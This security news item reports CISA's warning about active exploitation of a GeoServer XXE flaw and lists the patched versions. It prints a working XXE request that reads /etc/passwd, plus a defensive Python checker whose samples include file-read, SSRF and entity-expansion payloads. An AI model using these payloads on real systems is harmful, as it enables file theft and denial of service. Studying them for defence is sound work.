CISA reports active exploitation of GeoServer XXE flaw

Take action: If you run OSGeo GeoServer, this is urgent. Your server is under attack. If possible, isolate from the internet. Definitely upgrade to the latest patched version (2.25.6, 2.26.2, 2.27.0, 2.28.0, or 2.28.1).


Learn More

CISA reports active exploitation of a critical security flaw affecting OSGeo GeoServer. 

The vulnerability, tracked as CVE-2025-58360 (CVSS score 9.8), is an unauthenticated XML External Entity (XXE) injection caused by improper restriction of XML external entity references. It is triggered when GeoServer accepts XML input through the /geoserver/wms endpoint's GetMap operation.

Successful exploitation of this XXE vulnerability could enable attackers to access arbitrary files from the server's file system, exposing potentially sensitive configuration data and system information. Additionally, threat actors could leverage the flaw to conduct Server-Side Request Forgery (SSRF) attacks, allowing them to interact with internal systems that would normally be inaccessible from external networks. The vulnerability can also be weaponized to launch denial-of-service (DoS) attacks by exhausting server resources through malicious XML entity expansion, potentially disrupting critical mapping and geographic information services.

Example of the exploit

A legitimate WMS GetMap request to GeoServer might look like:

GET /geoserver/wms?service=WMS&version=1.1.0&request=GetMap&layers=topp:states&styles=&bbox=-124.73,24.96,-66.97,49.37&width=768&height=330&srs=EPSG:4326&format=image/png

Malicious XXE attack via XML POST: for request types that accept XML input (such as an SLD, Styled Layer Descriptor), an attacker could send:

POST /geoserver/wms?service=WMS&request=GetMap HTTP/1.1
Host: vulnerable-geoserver.example.com
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<StyledLayerDescriptor version="1.0.0">
  <NamedLayer>
    <Name>&xxe;</Name>
    <UserStyle>
      <Title>Attack Style</Title>
      <FeatureTypeStyle>
        <Rule>
          <PolygonSymbolizer>
            <Fill>
              <CssParameter name="fill">#FF0000</CssParameter>
            </Fill>
          </PolygonSymbolizer>
        </Rule>
      </FeatureTypeStyle>
    </UserStyle>
  </NamedLayer>
</StyledLayerDescriptor>
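As an added defender-side example (not from the advisory and not GeoServer code), the following Python check inspects the DOCTYPE of an incoming XML body before it reaches a parser and maps what it declares onto the three impacts described above: local file read (file: or scheme-less SYSTEM URIs), SSRF (remote URIs) and entity-expansion DoS. The regexes, the MAX_EXPANSION threshold and the sample bodies are this example's own constructions; a real WMS/SLD front end never needs a DTD and can simply refuse any body that carries a DOCTYPE.

```python
import re
from urllib.parse import urlsplit

# Hypothetical pre-parse check for XML bodies posted to a WMS endpoint.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b[^\[>]*(?:\[(?P<subset>.*?)\])?\s*>", re.S | re.I)
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<pe>%\s+)?(?P<name>[^\s%]+)\s+"
    r'(?:(?P<ext>SYSTEM|PUBLIC)\s+(?:"[^"]*"\s+)?"(?P<uri>[^"]*)"|"(?P<val>[^"]*)")',
    re.S | re.I,
)
MAX_EXPANSION = 10_000  # expanded bytes tolerated for one internal entity (example threshold)

def _expanded_size(name, internal, seen=()):
    """Size of `name` after recursive expansion; stops early once past the cap."""
    if name in seen or name not in internal:
        return 0
    text, size = internal[name], 0
    for ref in re.findall(r"&([^;\s]+);", text):
        size += _expanded_size(ref, internal, seen + (name,))
        if size > MAX_EXPANSION:
            return size
    return size + len(re.sub(r"&[^;\s]+;", "", text))

def classify_xml_body(body):
    """Sorted risk tags for what the body's DOCTYPE declares (empty if no DOCTYPE)."""
    m = DOCTYPE_RE.search(body)
    if not m:
        return []
    tags, internal = {"doctype_present"}, {}
    for e in ENTITY_RE.finditer(m.group("subset") or ""):
        if e.group("ext"):  # SYSTEM/PUBLIC: a DTD-enabled parser would fetch this URI
            scheme = urlsplit(e.group("uri")).scheme
            tags.add("external_entity_file" if scheme in ("", "file") else "external_entity_remote")
            if e.group("pe"):  # parameter entity: expanded inside the DTD itself
                tags.add("parameter_entity_external")
        else:
            internal[e.group("name")] = e.group("val")
    if any(_expanded_size(n, internal) > MAX_EXPANSION for n in internal):
        tags.add("entity_expansion")  # nested internal entities blow up on expansion
    return sorted(tags)

# Constructed sample bodies (not captured traffic): the advisory's file-read
# payload, a remote URI, a nested-entity expansion, and a clean SLD.
SAMPLES = {
    "file_read": '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
                 "<StyledLayerDescriptor><NamedLayer><Name>&xxe;</Name></NamedLayer></StyledLayerDescriptor>",
    "remote": '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://intranet.example.test/">]><a>&xxe;</a>',
    "expansion": '<!DOCTYPE a [<!ENTITY l0 "lol">' + "".join(
        f'<!ENTITY l{i} "{"&l%d;" % (i - 1) * 10}">' for i in range(1, 5)) + "]><a>&l4;</a>",
    "clean": '<?xml version="1.0"?><StyledLayerDescriptor version="1.0.0"/>',
}
```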

Affected Packages:

  • docker.osgeo.org/geoserver
  • org.geoserver.web:gs-web-app (Maven)
  • org.geoserver:gs-wms (Maven)

The vulnerability affects all versions of GeoServer up to and including 2.25.5, as well as versions ranging from 2.26.0 through 2.26.1. 

OSGeo has released patches to address this security issue in versions 2.25.6, 2.26.2, 2.27.0, 2.28.0, and 2.28.1.

Details about how the vulnerability is being exploited in real-world attacks have not been disclosed. An alert issued by the Canadian Centre for Cyber Security on November 28, 2025, confirmed that an exploit for CVE-2025-58360 exists in the wild and is being actively used by threat actors.

Federal Civilian Executive Branch (FCEB) agencies have been directed to apply the required security patches by January 1, 2026. Organizations running affected versions of GeoServer should prioritize patching.
